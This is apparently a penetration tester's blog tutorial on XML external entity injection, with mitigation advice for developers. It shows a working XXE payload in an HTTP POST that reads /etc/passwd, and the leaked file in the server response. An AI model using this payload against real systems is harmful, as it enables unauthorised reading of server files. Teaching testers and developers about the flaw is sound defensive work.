Many times when testing the security of XML, External Entity Injection is often overlooked. XML external entity injection vulnerabilities arise because the XML specification allows XML documents to define entities which reference resources external to the document. XML parsers typically support this feature by default, even though it is rarely required by applications during normal usage.

External entities can reference files on the parser’s filesystem; exploiting this feature may allow retrieval of arbitrary files, or denial of service by causing the server to read from a file such as /dev/random. They can also reference URLs; exploiting this feature may allow port scanning from the XML parser’s host, or the retrieval of sensitive web content which is otherwise inaccessible due to network topology and defenses.

Let’s check out an example of how to test this vulnerability…


In this example, I’m injecting a tag into the XML of this POST Request:

POST /servlet HTTP/1.1
Host: domain.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.18)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Referer: domain.com/frame.jsp
Content-Type: text/xml; charset=UTF-8

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><REQUEST><FROM>null</FROM><METHOD>SEND</METHOD><MESSAGE type=”MSG”><HEAD><ID>612117752013</ID><FROM>null</FROM><DESTINATION>UserManagerService&xxe;</DESTINATION><ACTION>logout</ACTION><EVENT>null</EVENT></HEAD><BODY /></MESSAGE></REQUEST>


The response results in the below output, and I can now view the server’s /etc/passwd file contents remotely through the web application:

HTTP/1.1 200 OK
Server: Application Server
Content-type: text/xml;charset=ISO-8859-1
Date: Mon, 14 Oct 2013 06:41:55 GMT
Content-Length: 67872

<REQUEST><FROM></FROM><MESSAGE type=”ERR”><HEAD><ID>137084651540055810</ID><FROM></FROM><DESTINATION></DESTINATION><ACTION></ACTION><EVENT></EVENT></HEAD><BODY><PARAM><KEY>Error</KEY><VALUE>Failed to send message to service UserManagerService
root:x:0:0:root:/root/home/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
user:x:56661:56661::/home/user:/bin/bash
pwc:x:56662:56662::/home/pwc:/bin/bash
admin:x:56663:56663::/home/admin:/bin/bash

</VALUE></PARAM></BODY></MESSAGE></REQUEST>


As a tester, make sure you add this to your XML Security Checklist of vulnerabilities to look for.

As a developer, XML external entity injection uses the DOCTYPE tag to define the injected entity. You can use XML parsers to disable the support for this tag as well as use input validation to block input containing the DOCTYPE tag.